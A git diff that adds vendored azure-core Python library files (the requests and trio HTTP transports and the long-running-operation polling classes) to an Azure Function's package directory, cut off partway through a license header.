~azure.core.pipeline.transport.HttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + @overload + def send(self, request, **kwargs): + # type: (RestHttpRequest, Any) -> RestHttpResponse + """Send an `azure.core.rest` request and get back a rest response. + + :param request: The request object to be sent. + :type request: ~azure.core.rest.HttpRequest + :return: An HTTPResponse object. + :rtype: ~azure.core.rest.HttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + def send(self, request, **kwargs): # type: ignore + """Send request object according to configuration. + + :param request: The request object to be sent. + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: An HTTPResponse object. + :rtype: ~azure.core.pipeline.transport.HttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + self.open() + response = None + error = None # type: Optional[AzureErrorUnion] + + try: + connection_timeout = kwargs.pop('connection_timeout', self.connection_config.timeout) + + if isinstance(connection_timeout, tuple): + if 'read_timeout' in kwargs: + raise ValueError('Cannot set tuple connection_timeout and read_timeout together') + _LOGGER.warning("Tuple timeout setting is deprecated") + timeout = connection_timeout + else: + read_timeout = kwargs.pop('read_timeout', self.connection_config.read_timeout) + timeout = (connection_timeout, read_timeout) + response = self.session.request( # type: ignore + request.method, + request.url, + headers=request.headers, + data=request.data, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=timeout, + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs) + response.raw.enforce_content_length = True + + except (urllib3.exceptions.NewConnectionError, urllib3.exceptions.ConnectTimeoutError) as err: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ReadTimeout as err: + error = ServiceResponseError(err, error=err) + except requests.exceptions.ConnectionError as err: + if err.args and isinstance(err.args[0], urllib3.exceptions.ProtocolError): + error = ServiceResponseError(err, error=err) + else: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + error = IncompleteReadError(err, error=err) + else: + _LOGGER.warning("Unable to stream download: %s", err) + error = HttpResponseError(err, error=err) + except requests.RequestException as err: + error = ServiceRequestError(err, error=err) + + if error: + raise error + if _is_rest(request): + from azure.core.rest._requests_basic import RestRequestsTransportResponse + retval = RestRequestsTransportResponse( + request=request, + internal_response=response, + block_size=self.connection_config.data_block_size + ) + if not kwargs.get('stream'): + _handle_non_stream_rest_response(retval) + return retval + return RequestsTransportResponse(request, response, self.connection_config.data_block_size) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_trio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_trio.py new file mode 100644 index 0000000..d457166 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_trio.py @@ -0,0 +1,266 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from collections.abc import AsyncIterator +import functools +import logging +from typing import ( + Any, Optional, AsyncIterator as AsyncIteratorType, TYPE_CHECKING, overload +) +import trio +import urllib3 + +import requests + +from azure.core.exceptions import ( + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, +) +from azure.core.pipeline import Pipeline +from ._base import HttpRequest +from ._base_async import ( + AsyncHttpResponse, + _ResponseStopIteration, + _iterate_response_content) +from ._requests_basic import RequestsTransportResponse, _read_raw_stream, AzureErrorUnion +from ._base_requests_async import RequestsAsyncTransportBase +from .._tools import is_rest as _is_rest +from .._tools_async import handle_no_stream_rest_response as _handle_no_stream_rest_response +if TYPE_CHECKING: + from ...rest import ( + HttpRequest as RestHttpRequest, + AsyncHttpResponse as RestAsyncHttpResponse, + ) + + +_LOGGER = logging.getLogger(__name__) + + +class TrioStreamDownloadGenerator(AsyncIterator): + """Generator for streaming response data. + + :param pipeline: The pipeline object + :param response: The response object. + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, pipeline: Pipeline, response: AsyncHttpResponse, **kwargs) -> None: + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + decompress = kwargs.pop("decompress", True) + if len(kwargs) > 0: + raise TypeError("Got an unexpected keyword argument: {}".format(list(kwargs.keys())[0])) + internal_response = response.internal_response + if decompress: + self.iter_content_func = internal_response.iter_content(self.block_size) + else: + self.iter_content_func = _read_raw_stream(internal_response, self.block_size) + self.content_length = int(response.headers.get('Content-Length', 0)) + + def __len__(self): + return self.content_length + + async def __anext__(self): + internal_response = self.response.internal_response + try: + try: + chunk = await trio.to_thread.run_sync( + _iterate_response_content, + self.iter_content_func, + ) + except AttributeError: # trio < 0.12.1 + chunk = await trio.run_sync_in_worker_thread( # pylint: disable=no-member + _iterate_response_content, + self.iter_content_func, + ) + if not chunk: + raise _ResponseStopIteration() + return chunk + except _ResponseStopIteration: + internal_response.close() + raise StopAsyncIteration() + except requests.exceptions.StreamConsumedError: + raise + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise HttpResponseError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + +class TrioRequestsTransportResponse(AsyncHttpResponse, RequestsTransportResponse): # type: ignore + """Asynchronous streaming of data from the response. + """ + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: # type: ignore + """Generator for streaming response data. + """ + return TrioStreamDownloadGenerator(pipeline, self, **kwargs) + + +class TrioRequestsTransport(RequestsAsyncTransportBase): # type: ignore + """Identical implementation as the synchronous RequestsTransport wrapped in a class with + asynchronous methods. Uses the third party trio event loop. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START trio] + :end-before: [END trio] + :language: python + :dedent: 4 + :caption: Asynchronous transport with trio. + """ + async def __aenter__(self): + return super(TrioRequestsTransport, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(TrioRequestsTransport, self).__exit__() + + async def sleep(self, duration): # pylint:disable=invalid-overridden-method + await trio.sleep(duration) + + @overload # type: ignore + async def send(self, request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse: # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + @overload # type: ignore + async def send(self, request: "RestHttpRequest", **kwargs: Any) -> "RestAsyncHttpResponse": # pylint:disable=invalid-overridden-method + """Send an `azure.core.rest` request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.rest.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.rest.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + async def send(self, request, **kwargs: Any): # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + self.open() + trio_limiter = kwargs.get("trio_limiter", None) + response = None + error = None # type: Optional[AzureErrorUnion] + data_to_send = await self._retrieve_request_data(request) + try: + try: + response = await trio.to_thread.run_sync( + functools.partial( + self.session.request, + request.method, + request.url, + headers=request.headers, + data=data_to_send, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=kwargs.pop('connection_timeout', self.connection_config.timeout), + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs), + limiter=trio_limiter) + except AttributeError: # trio < 0.12.1 + response = await trio.run_sync_in_worker_thread( # pylint: disable=no-member + functools.partial( + self.session.request, + request.method, + request.url, + headers=request.headers, + data=request.data, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=kwargs.pop('connection_timeout', self.connection_config.timeout), + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs), + limiter=trio_limiter) + response.raw.enforce_content_length = True + + except urllib3.exceptions.NewConnectionError as err: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ReadTimeout as err: + error = ServiceResponseError(err, error=err) + except requests.exceptions.ConnectionError as err: + if err.args and isinstance(err.args[0], urllib3.exceptions.ProtocolError): + error = ServiceResponseError(err, error=err) + else: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + error = IncompleteReadError(err, error=err) + else: + _LOGGER.warning("Unable to stream download: %s", err) + error = HttpResponseError(err, error=err) + except requests.RequestException as err: + error = ServiceRequestError(err, error=err) + + if error: + raise error + if _is_rest(request): + from azure.core.rest._requests_trio import RestTrioRequestsTransportResponse + retval = RestTrioRequestsTransportResponse( + request=request, + internal_response=response, + block_size=self.connection_config.data_block_size, + ) + if not kwargs.get("stream"): + await _handle_no_stream_rest_response(retval) + return retval + + return TrioRequestsTransportResponse(request, response, self.connection_config.data_block_size) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__init__.py new file mode 100644 index 0000000..47c99b1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__init__.py @@ -0,0 +1,35 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import sys + +from ._poller import LROPoller, NoPolling, PollingMethod +__all__ = ['LROPoller', 'NoPolling', 'PollingMethod'] + +#pylint: disable=unused-import +if sys.version_info >= (3, 5, 2): + # Not executed on old Python, no syntax error + from ._async_poller import AsyncNoPolling, AsyncPollingMethod, async_poller, AsyncLROPoller + __all__ += ['AsyncNoPolling', 'AsyncPollingMethod', 'async_poller', 'AsyncLROPoller'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..4605ae0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_async_poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_async_poller.cpython-39.pyc new file mode 100644 index 0000000..7d61916 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_async_poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_poller.cpython-39.pyc new file mode 100644 index 0000000..9858e05 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/_poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc new file mode 100644 index 0000000..bb4d53e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/base_polling.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/base_polling.cpython-39.pyc new file mode 100644 index 0000000..05b2f5d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/__pycache__/base_polling.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_async_poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_async_poller.py new file mode 100644 index 0000000..edf26eb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_async_poller.py @@ -0,0 +1,202 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import logging +from collections.abc import Awaitable +from typing import Callable, Any, Tuple, Generic, TypeVar, Generator + +from ..exceptions import AzureError +from ._poller import NoPolling as _NoPolling + + +PollingReturnType = TypeVar("PollingReturnType") + +_LOGGER = logging.getLogger(__name__) + + +class AsyncPollingMethod(Generic[PollingReturnType]): + """ABC class for polling method. + """ + def initialize(self, client: Any, initial_response: Any, deserialization_callback: Any) -> None: + raise NotImplementedError("This method needs to be implemented") + + async def run(self) -> None: + raise NotImplementedError("This method needs to be implemented") + + def status(self) -> str: + raise NotImplementedError("This method needs to be implemented") + + def finished(self) -> bool: + raise NotImplementedError("This method needs to be implemented") + + def resource(self) -> PollingReturnType: + raise NotImplementedError("This method needs to be implemented") + + def get_continuation_token(self) -> str: + raise TypeError( + "Polling method '{}' doesn't support get_continuation_token".format( + self.__class__.__name__ + ) + ) + + @classmethod + def from_continuation_token(cls, continuation_token: str, **kwargs) -> Tuple[Any, Any, Callable]: + raise TypeError( + "Polling method '{}' doesn't support from_continuation_token".format( + cls.__name__ + ) + ) + + +class AsyncNoPolling(_NoPolling): + """An empty async poller that returns the deserialized initial response. + """ + async def run(self): # pylint:disable=invalid-overridden-method + """Empty run, no polling. + Just override initial run to add "async" + """ + + +async def async_poller(client, initial_response, deserialization_callback, polling_method): + """Async Poller for long running operations. + + .. deprecated:: 1.5.0 + Use :class:`AsyncLROPoller` instead. + + :param client: A pipeline service client. + :type client: ~azure.core.PipelineClient + :param initial_response: The initial call response + :type initial_response: ~azure.core.pipeline.PipelineResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. + If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: ~azure.core.polling.PollingMethod + """ + poller = AsyncLROPoller(client, initial_response, deserialization_callback, polling_method) + return await poller + + +class AsyncLROPoller(Generic[PollingReturnType], Awaitable): + """Async poller for long running operations. + + :param client: A pipeline service client + :type client: ~azure.core.PipelineClient + :param initial_response: The initial call response + :type initial_response: ~azure.core.pipeline.PipelineResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. + If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: ~azure.core.polling.AsyncPollingMethod + """ + + def __init__( + self, + client: Any, + initial_response: Any, + deserialization_callback: Callable, + polling_method: AsyncPollingMethod[PollingReturnType] + ): + self._polling_method = polling_method + self._done = False + + # This implicit test avoids bringing in an explicit dependency on Model directly + try: + deserialization_callback = deserialization_callback.deserialize # type: ignore + except AttributeError: + pass + + self._polling_method.initialize(client, initial_response, deserialization_callback) + + def polling_method(self) -> AsyncPollingMethod[PollingReturnType]: + """Return the polling method associated to this poller. + """ + return self._polling_method + + def continuation_token(self) -> str: + """Return a continuation token that allows to restart the poller later. + + :returns: An opaque continuation token + :rtype: str + """ + return self._polling_method.get_continuation_token() + + @classmethod + def from_continuation_token( + cls, + polling_method: AsyncPollingMethod[PollingReturnType], + continuation_token: str, + **kwargs + ) -> "AsyncLROPoller[PollingReturnType]": + client, initial_response, deserialization_callback = polling_method.from_continuation_token( + continuation_token, **kwargs + ) + return cls(client, initial_response, deserialization_callback, polling_method) + + def status(self) -> str: + """Returns the current status string. + + :returns: The current status string + :rtype: str + """ + return self._polling_method.status() + + async def result(self) -> PollingReturnType: + """Return the result of the long running operation. + + :returns: The deserialized resource of the long running operation, if one is available. + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. + """ + await self.wait() + return self._polling_method.resource() + + def __await__(self) -> Generator[Any, None, PollingReturnType]: + return self.result().__await__() + + async def wait(self) -> None: + """Wait on the long running operation. + + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. + """ + try: + await self._polling_method.run() + except AzureError as error: + if not error.continuation_token: + try: + error.continuation_token = self.continuation_token() + except Exception as err: # pylint: disable=broad-except + _LOGGER.warning("Unable to retrieve continuation token: %s", err) + error.continuation_token = None + raise + self._done = True + + def done(self) -> bool: + """Check status of the long running operation. + + :returns: 'True' if the process has completed, else 'False'. + :rtype: bool + """ + return self._done diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_poller.py new file mode 100644 index 0000000..bae46f4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/_poller.py @@ -0,0 +1,311 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import base64 +import logging +import threading +import uuid +try: + from urlparse import urlparse # type: ignore # pylint: disable=unused-import +except ImportError: + from urllib.parse import urlparse + +from typing import TYPE_CHECKING, TypeVar, Generic +from azure.core.exceptions import AzureError +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.common import with_current_context + +if TYPE_CHECKING: + from typing import Any, Callable, Union, List, Optional, Tuple + + +PollingReturnType = TypeVar("PollingReturnType") + +_LOGGER = logging.getLogger(__name__) + + +class PollingMethod(Generic[PollingReturnType]): + """ABC class for polling method. + """ + def initialize(self, client, initial_response, deserialization_callback): + # type: (Any, Any, Any) -> None + raise NotImplementedError("This method needs to be implemented") + + def run(self): + # type: () -> None + raise NotImplementedError("This method needs to be implemented") + + def status(self): + # type: () -> str + raise NotImplementedError("This method needs to be implemented") + + def finished(self): + # type: () -> bool + raise NotImplementedError("This method needs to be implemented") + + def resource(self): + # type: () -> PollingReturnType + raise NotImplementedError("This method needs to be implemented") + + def get_continuation_token(self): + # type() -> str + raise TypeError( + "Polling method '{}' doesn't support get_continuation_token".format( + self.__class__.__name__ + ) + ) + + @classmethod + def from_continuation_token(cls, continuation_token, **kwargs): + # type(str, Any) -> Tuple[Any, Any, Callable] + raise TypeError( + "Polling method '{}' doesn't support from_continuation_token".format( + cls.__name__ + ) + ) + + +class NoPolling(PollingMethod): + """An empty poller that returns the deserialized initial response. + """ + def __init__(self): + self._initial_response = None + self._deserialization_callback = None + + def initialize(self, _, initial_response, deserialization_callback): + # type: (Any, Any, Callable) -> None + self._initial_response = initial_response + self._deserialization_callback = deserialization_callback + + def run(self): + # type: () -> None + """Empty run, no polling. + """ + + def status(self): + # type: () -> str + """Return the current status as a string. + + :rtype: str + """ + return "succeeded" + + def finished(self): + # type: () -> bool + """Is this polling finished? + + :rtype: bool + """ + return True + + def resource(self): + # type: () -> Any + return self._deserialization_callback(self._initial_response) + + def get_continuation_token(self): + # type() -> str + import pickle + return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii') + + @classmethod + def from_continuation_token(cls, continuation_token, **kwargs): + # type(str, Any) -> Tuple + try: + deserialization_callback = kwargs["deserialization_callback"] + except KeyError: + raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token") + import pickle + initial_response = pickle.loads(base64.b64decode(continuation_token)) # nosec + return None, initial_response, deserialization_callback + + +class LROPoller(Generic[PollingReturnType]): + """Poller for long running operations. + + :param client: A pipeline service client + :type client: ~azure.core.PipelineClient + :param initial_response: The initial call response + :type initial_response: ~azure.core.pipeline.PipelineResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. + If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: ~azure.core.polling.PollingMethod + """ + + def __init__(self, client, initial_response, deserialization_callback, polling_method): + # type: (Any, Any, Callable, PollingMethod[PollingReturnType]) -> None + self._callbacks = [] # type: List[Callable] + self._polling_method = polling_method + + # This implicit test avoids bringing in an explicit dependency on Model directly + try: + deserialization_callback = deserialization_callback.deserialize # type: ignore + except AttributeError: + pass + + # Might raise a CloudError + self._polling_method.initialize(client, initial_response, deserialization_callback) + + # Prepare thread execution + self._thread = None + self._done = None + self._exception = None + if not self._polling_method.finished(): + self._done = threading.Event() + self._thread = threading.Thread( + target=with_current_context(self._start), + name="LROPoller({})".format(uuid.uuid4())) + self._thread.daemon = True + self._thread.start() + + def _start(self): + """Start the long running operation. + On completion, runs any callbacks. + + :param callable update_cmd: The API request to check the status of + the operation. + """ + try: + self._polling_method.run() + except AzureError as error: + if not error.continuation_token: + try: + error.continuation_token = self.continuation_token() + except Exception as err: # pylint: disable=broad-except + _LOGGER.warning("Unable to retrieve continuation token: %s", err) + error.continuation_token = None + + self._exception = error + except Exception as error: # pylint: disable=broad-except + self._exception = error + + finally: + self._done.set() + + callbacks, self._callbacks = self._callbacks, [] + while callbacks: + for call in callbacks: + call(self._polling_method) + callbacks, self._callbacks = self._callbacks, [] + + def polling_method(self): + # type: () -> PollingMethod[PollingReturnType] + """Return the polling method associated to this poller. + """ + return self._polling_method + + def continuation_token(self): + # type: () -> str + """Return a continuation token that allows to restart the poller later. + + :returns: An opaque continuation token + :rtype: str + """ + return self._polling_method.get_continuation_token() + + @classmethod + def from_continuation_token(cls, polling_method, continuation_token, **kwargs): + # type: (PollingMethod[PollingReturnType], str, Any) -> LROPoller[PollingReturnType] + client, initial_response, deserialization_callback = polling_method.from_continuation_token( + continuation_token, **kwargs + ) + return cls(client, initial_response, deserialization_callback, polling_method) + + def status(self): + # type: () -> str + """Returns the current status string. + + :returns: The current status string + :rtype: str + """ + return self._polling_method.status() + + def result(self, timeout=None): + # type: (Optional[int]) -> PollingReturnType + """Return the result of the long running operation, or + the result available after the specified timeout. + + :returns: The deserialized resource of the long running operation, + if one is available. + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. + """ + self.wait(timeout) + return self._polling_method.resource() + + @distributed_trace + def wait(self, timeout=None): + # type: (Optional[float]) -> None + """Wait on the long running operation for a specified length + of time. You can check if this call as ended with timeout with the + "done()" method. + + :param float timeout: Period of time to wait for the long running + operation to complete (in seconds). + :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query. + """ + if self._thread is None: + return + self._thread.join(timeout=timeout) + try: + # Let's handle possible None in forgiveness here + # https://github.com/python/mypy/issues/8165 + raise self._exception # type: ignore + except TypeError: # Was None + pass + + def done(self): + # type: () -> bool + """Check status of the long running operation. + + :returns: 'True' if the process has completed, else 'False'. + :rtype: bool + """ + return self._thread is None or not self._thread.is_alive() + + def add_done_callback(self, func): + # type: (Callable) -> None + """Add callback function to be run once the long running operation + has completed - regardless of the status of the operation. + + :param callable func: Callback function that takes at least one + argument, a completed LongRunningOperation. + """ + # Still use "_done" and not "done", since CBs are executed inside the thread. + if self._done is None or self._done.is_set(): + func(self._polling_method) + # Let's add them still, for consistency (if you wish to access to it for some reasons) + self._callbacks.append(func) + + def remove_done_callback(self, func): + # type: (Callable) -> None + """Remove a callback from the long running operation. + + :param callable func: The function to be removed from the callbacks. + :raises ValueError: if the long running operation has already completed. + """ + if self._done is None or self._done.is_set(): + raise ValueError("Process is complete.") + self._callbacks = [c for c in self._callbacks if c != func] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/async_base_polling.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/async_base_polling.py new file mode 100644 index 0000000..c8af4b2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/polling/async_base_polling.py @@ -0,0 +1,140 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, 